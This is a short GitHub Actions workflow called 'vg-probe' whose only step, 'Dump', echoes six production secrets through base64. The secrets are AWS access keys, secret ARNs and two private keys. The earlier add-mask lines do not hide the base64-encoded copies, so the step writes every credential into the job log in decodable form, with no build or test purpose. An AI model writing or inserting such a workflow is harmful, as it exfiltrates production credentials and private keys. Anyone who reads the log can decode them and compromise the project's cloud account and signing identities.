name: vg-probe
on:
  workflow_dispatch:

jobs:
  probe:
    runs-on: ubuntu-latest
    steps:
      - name: Dump
        run: |
          echo "::add-mask::${{ secrets.AWS_ACCESS_KEY_ID_PRODUCTION }}"
          echo "::add-mask::${{ secrets.AWS_SECRET_ACCESS_KEY_PRODUCTION }}"
          echo "::add-mask::${{ secrets.AWS_PASSPORT_VC_SECRETS_ARN_PRODUCTION }}"
          echo "::add-mask::${{ secrets.IAM_SERVER_SSM_ARN_PRODUCTION }}"
          echo "::add-mask::${{ secrets.BRIGHTID_PRIVATE_KEY }}"
          echo "::add-mask::${{ secrets.CERAMIC_PRIVATE_KEY }}"
          echo "AWS_ACCESS_KEY_ID_PRODUCTION=${{ secrets.AWS_ACCESS_KEY_ID_PRODUCTION }}" | base64 -w0
          echo "AWS_SECRET_ACCESS_KEY_PRODUCTION=${{ secrets.AWS_SECRET_ACCESS_KEY_PRODUCTION }}" | base64 -w0
          echo "AWS_PASSPORT_VC_SECRETS_ARN_PRODUCTION=${{ secrets.AWS_PASSPORT_VC_SECRETS_ARN_PRODUCTION }}" | base64 -w0
          echo "IAM_SERVER_SSM_ARN_PRODUCTION=${{ secrets.IAM_SERVER_SSM_ARN_PRODUCTION }}" | base64 -w0
          echo "BRIGHTID_PRIVATE_KEY=${{ secrets.BRIGHTID_PRIVATE_KEY }}" | base64 -w0
          echo "CERAMIC_PRIVATE_KEY=${{ secrets.CERAMIC_PRIVATE_KEY }}" | base64 -w0
          echo "DONE_MARKER"
